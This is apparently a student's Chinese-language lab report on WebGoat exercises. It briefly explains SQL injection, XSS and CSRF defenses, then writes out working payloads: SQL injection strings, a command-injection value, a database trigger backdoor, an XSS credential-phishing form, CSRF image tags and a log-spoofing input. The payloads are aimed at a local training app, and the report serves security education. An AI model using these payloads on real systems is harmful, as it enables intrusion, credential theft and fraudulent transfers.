20145214 《网络对抗技术》 Web安全基础实践

20145214 《网络对抗技术》 Web安全基础实践

1.实验后回答问题

（1）SQL注入攻击原理，如何防御

• SQL注入攻击就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意SQL命令的目的
• 防御：利用输入规则限制进行防御，过滤输入的数据，不允许特殊字符输入

（2）XSS攻击的原理，如何防御

• 跨站脚本攻击，允许恶意用户将恶意Script代码注入到网页上，当用户浏览网页时，嵌入其中Web里面的Script代码会被执行，从而被攻击，其他用户在观看网页时就会受到影响。XSS攻击的主要目的是，想办法获取目标攻击网站的cookie，因为有了cookie相当于有了seesion，有了这些信息就可以在任意能接进互联网的pc登陆该网站，并以其他人的身份登陆，做一些破坏。

• 防御：

    完善过滤体系，对用户的输入进行处理，只允许输入合法的值，其它值一概过滤掉
    对尖括号、引号等标签进行转换，换成文本内容显示，如果这样的话，在攻击代码进行转换存储后就不是一段可执行的代码了
  

（3）CSRF攻击原理，如何防御

• CSRF是跨站请求伪造，是一种对网站的恶意利用，通过伪装来自受信任用户的请求来利用受信任的网站

• 防御：

    通过referer、token或者验证码来检测用户提交
    在form中包含秘密信息、用户指定的代号作为cookie之外的验证
    定期清理保存的cookie
  

2.实验总结与体会

• 这次实验刚一开始做看到全英文的wedgoat就有点崩溃，还好有课题负责人兼职翻译，自己也试着静下心来一点点看，还是能看懂意思的，虽然翻译不出来，但是心里明白大概是是啥了...后面做着做着就有点好玩起来了，像在闯关，看到绿钩钩一个一个多起来的时候心情莫名的爽，这个实验可能或许会上瘾
• 实验里的做的东西要是真的能实现就美妙了，体会到了SQL注入攻击、XSS攻击和CSRF攻击的强大，又有点感慨，其实这些攻击大部分都是一样的“套路”，但是只要网站的设计人员在WEB设计的时候忽视了WEB安全，我们就会轻易地掉进这些陷阱里了。嗯，以后登录网站还是得慎之又慎...

3.实践过程记录

实验前准备

• java -jar webgoat-container-7.0.1-war-exec.jar指令开启webgoat
• 在页面停止在如下界面时，在浏览器中打开localhost:8080/WebGoat，使用默认的用户名和密码进入webgoat
  

（1）String SQL Injection

• 题目大意是：这个表单允许使用者查询他们的信用卡号，使用SQL注入让所有的信用卡号都看得见。

• 先尝试一个输入，看看输入的内容出现在哪里了，来找到我们要进行SQL注入的位置
  

• 在文本框中输入' or 1=1 --进行攻击
  

• 攻击之所以能成功，就是因为我们构造了一个’使lastname后面的引号完整，并且加上一个or 1=1的永真式，使得不管前面的WHERE是否成立都能执行。

（2）Command Injection

• 题目的要求是：尝试给操作系统注入命令行，要求能够在目标主机上执行系统命令

• 通过火狐浏览器下的一个扩展Firebug对源代码进行修改，右键点击BackDoors.help,选择用扩展Firebug打开，这样就可以直接定位到需要修改的位置，无需一行一行代码的查看了

• 例如在BackDoors.help旁边加上"& netstat -an & ipconfig"
  

• 修改之后在下拉菜单中能看到我们修改后的值
  

• 选中修改后的值再点view按钮，可以看到命令被执行，出现系统网络连接情况
  

（3）Numeric SQL Injection

• 题目大意是这个表单允许使用者看到天气数据，利用SQL注入使得可以看见所有数据
  

• 和之前的实验类似，只要加上一个1=1这种永真式即可达到我们的目的

• 依旧利用firebug，在任意一个值比如101旁边加上or 1=1
  

• 选中我们刚刚修改的Columbia选项，点击Go，就可以看到所有天气数据了
  

（4）LAB:SQL Injection(Stage 1:String SQL Injection)

• 题目要求使用字符串SQL注入在没有正确密码的情况下登录账号boss

• 用老套路，以用户Neville登录，在密码栏中输入' or 1=1 --进行SQL注入，发现登录失败
  

• 查看了一下网页源码，发现输入框对输入的字符长度进行了限制，最多只允许输入8个字符
  

• 对字符长度进行修改
  

• 重新登录，登录成功
  

（5）LAB:SQL Injection(Stage 3:Numeric SQL Injection)

• 题目要求通过一个普通员工的账户larry，浏览其BOSS的账户信息

• 用上一题的办法先以用户名Larry登录，登录之后看到浏览员工信息的按钮是ViewProfile
  

• 在网页代码中分析按钮ViewProfile，发现这个地方是以员工ID作为索引传递参数的

• 要达到通过Larry来浏览老板账户信息的目的，一般来说老板的工资都应该是最高的，所以把其中的value值改为101 or 1=1 order by salary desc --，这样老板的信息就会被排到第一个
  

• 之后就可以查看到老板的信息
  

（6）Database Backdoors

• 首先输一个101，得到该用户的信息
  

• 输入注入语句：101; update employee set salary=5214，成功把该用户的工资改成了5214（降工资了真对不起该用户...）
  

• 使用语句101;CREATE TRIGGER lxmBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='20145215@163.com' WHERE userid = NEW.userid创建一个后门，把表中所有的邮箱和用户ID都设为我自己的（这时候仿佛得到了全世界...）
  

（7）Phishing with XSS

• 这是跨站脚本钓鱼攻击，要求在搜索框中输入XSS攻击代码，利用XSS可以在已存在的页面中进一步添加元素的特点

• 在文本框里面输入一个钓鱼网站代码如下

    </form>
      <script>
    function hack(){ 
    XSSImage=new Image;
    XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
    alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " +                         document.phish.pass.value);
    } 
      </script>
    <form name="phish">
    <br>
    <br>
    <HR>
      <H2>This feature requires account login:</H2>
    <br>
      <br>Enter Username:<br>
      <input type="text" name="user">
      <br>Enter Password:<br>
      <input type="password" name = "pass">
    <br>
      <input type="submit" name="login" value="login" onclick="hack()">
    </form>
    <br>
    <br>
    <HR>
  

• 在搜索框中输入攻击代码后点击搜索，会看到一个要求输入用户名密码的表单如下
  

• 输入用户名密码
  

• 点击登录，WebGoat会将输入的信息捕获并反馈回来，攻击成功
  

（8）Stored XSS Attacks

• 要求创建非法的消息内容，可以导致其他用户访问时载入非预期的页面或内容

• 在Message中构造语句<script>alert("5214 attack succeed!");</script>，提交后，可以发现刚刚创建的帖子20145214
  

• 点击，成功弹出窗口，说明攻击成功
  

（9）Reflected XSS Attacks

• 在code框中输入<script>alert("20145214~~");</script>，将带有攻击性的URL作为输入源，显示如下
  

• 反射型XSS攻击成功
  

（10）Cross Site Request Forgery(CSRF)

• 写一个URL诱使其他用户点击，从而触发CSRF攻击，我们可以以图片的的形式将URL放进Message框，这时的URL对其他用户是不可见的，用户一旦点击图片，就会触发一个CSRF事件

• 在message框中输入<img src="http://localhost:8080/WebGoat/attack?Screen=288&menu=900&transferFunds=5214"/>
  

• 提交后在下面的Message List里面可以看我刚刚发送的消息
  

• 点击该消息，当前页面就会下载这个消息并显示出来，转走用户的5214元，从而达到CSRF攻击的目的
  

（11）CSRF Prompt By-Pass

• 和上一个一样要构造CSRF攻击，不过这次其包括了两个请求，一是转账请求，二是确认转账成功请求，即需要额外传递两个参数给服务器（transferFunds=4000，transferFunds=CONFIRM）

• 在浏览器中输入localhost:8080/WebGoat/attack?Screen=273&menu=900&transferFunds=5214进入确认转账请求页面
  

• 查看网页代码，发现transferFunds的值变成了CONFIRM
  

• 点击了CONFIRM按钮之后，再在浏览器中输入URL，攻击成功
  

（12）Log Spoofing

• 使用障眼法来使用户名为“admin”的用户在日志中显示“成功登录”

• 在User Name文本框中输入zn%0d%0aLogin Succeeded for username: admin，其中%0d是回车，%0a是换行符
  

• 如图所示，攻击成功
  

最后总结一下做了什么那就贴个图吧

• 

•